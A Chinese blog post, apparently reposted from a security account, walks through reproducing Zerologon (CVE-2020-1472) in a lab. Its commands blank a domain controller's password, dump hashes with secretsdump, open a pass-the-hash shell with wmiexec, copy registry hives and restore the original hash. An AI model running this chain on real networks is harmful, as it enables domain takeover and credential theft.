暂无图片
暂无图片
暂无图片
暂无图片
暂无图片
首页 / CVE-2020-1472复现打域控

CVE-2020-1472复现打域控

HACKWAY 2021-06-11
882

简介

Netlogon使用的AES认证算法中的vi向量默认为0,导致攻击者可以绕过认证,同时其设置域控密码的远程接口也使用了该函数,导致可以将域控中保存在AD中的管理员password设置为空

复现环境

DC: os:windows 2012 server ip:192.168.106.137

攻击机: os:kali ip:192.168.106.129

影响版本

Windows Server 2008 R2 for x64-based Systems Service Pack 1Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) Windows Server 2012 Windows Server 2012 (Server Core installation) Windows Server 2012 R2 Windows Server 2012 R2 (Server Core installation) Windows Server 2016 Windows Server 2016 (Server Core installation) Windows Server 2019 Windows Server 2019 (Server Core installation) Windows Server, version 1903 (Server Core installation) Windows Server, version 1909 (Server Core installation) Windows Server, version 2004 (Server Core installation)

域环境搭建

关于域环境的搭建,可以参考这篇文章Windows Server 2012搭建域环境

搭建完毕后,可以使用Netdom query fsmo
命令查看域环境信息

nbtstat -n
 获取当前机器的NetBIOS名称

复现过程

漏洞验证

下载poc:https://github.com/SecuraBV/CVE-2020-1472 验证漏洞是否存在: python3 zerologon_tester.py DC_NETBIOS_NAME DC_IP_ADDR
 如下图所示,漏洞存在

漏洞利用

下载exp: git clone https://github.com/dirkjanm/CVE-2020-1472

置空DC的密码 python3 cve-2020-1472-exploit.py DC_NETBIOS_NAME DC_IP_ADDR

如果出现了下图中的错误:

可以参考图中的方式修复

获取HASH

使用impacket包中的secretsdum.py来获取相关的HASh python3 secretsdump.py DOMAIN/DC_NETBIOS_NAME\$@DC_IP_ADDR -no-pass

获取shell

获取HASH后,可以利用wmiexec.py登录,从而获取一个SHELL python wmiexec.py -hashes <HASH> DOMAIN/DOMAIN_USER@DC_IP_ADDR

恢复原HASH

执行以下命令,获取SAM中原来的HASH

# SHELL 
reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save
get system.save
get sam.saveget security.save
del f system.save
del f sam.save
del /f security.save
exit
复制

保存在kali中

解析HASH

执行如下命令,利用secretsdump.py解析保存在本地的nt hash python3 secretsdump.py -sam sam.save -system system.save -security security.save LOCAL

需要保存的数据 a5d65e274a2db831ae4b246ec8fe51de

恢复HASH

恢复HASH的工具: git clone https://github.com/risksense/zerologon

执行命令: python3 reinstall_original_pw.py DC_NETBIOS_NAME DC_IP_ADDR <ORI_HASH>

检查是否恢复

再次执行命令

python3 secretsdump.py DOMAIN/DC_NETBIOS_NAME\$@DC_IP_ADDR -no-pass

参考资料

[0]参考文章:https://blog.csdn.net/sinat_36853972/article/details/108715304

[1]Windows Server 2012搭建域环境:https://www.cnblogs.com/xfan1982/p/4120583.html

[2]CVE-2020-1472 域内提权完整利用:https://mp.weixin.qq.com/s/RUkGMxM5GjFrEiKa8aH6JA

[3]CVE-2020-1472复现:https://my.oschina.net/Umbrel1a/blog/4589778

[4]Windows Server 2012搭建域环境:https://www.cnblogs.com/xfan1982/p/4120583.html

为你铺好的HACKWAY
长按扫码上车
你点的每个在看,我都认真当成了喜欢
数据库
文章转载自HACKWAY,如果涉嫌侵权,请发送邮件至:contact@modb.pro进行举报,并提供相关证据,一经查实,墨天轮将立刻删除相关内容。

评论

相关阅读

2025年4月中国数据库流行度排行榜:OB高分复登顶,崖山稳驭撼十强
墨天轮编辑部
2542次阅读
2025-04-09 15:33:27
数据库国产化替代深化:DBA的机遇与挑战
代晓磊
1184次阅读
2025-04-27 16:53:22
2025年3月国产数据库中标情况一览:TDSQL大单622万、GaussDB大单581万……
通讯员
858次阅读
2025-04-10 15:35:48
2025年4月国产数据库中标情况一览:4个千万元级项目,GaussDB与OceanBase大放异彩!
通讯员
678次阅读
2025-04-30 15:24:06
数据库,没有关税却有壁垒
多明戈教你玩狼人杀
583次阅读
2025-04-11 09:38:42
天津市政府数据库框采结果公布,7家数据库产品入选!
通讯员
569次阅读
2025-04-10 12:32:35
国产数据库需要扩大场景覆盖面才能在竞争中更有优势
白鳝的洞穴
547次阅读
2025-04-14 09:40:20
【活动】分享你的压箱底干货文档,三篇解锁进阶奖励!
墨天轮编辑部
487次阅读
2025-04-17 17:02:24
一页概览:Oracle GoldenGate
甲骨文云技术
464次阅读
2025-04-30 12:17:56
GoldenDB数据库v7.2焕新发布,助力全行业数据库平滑替代
GoldenDB分布式数据库
457次阅读
2025-04-30 12:17:50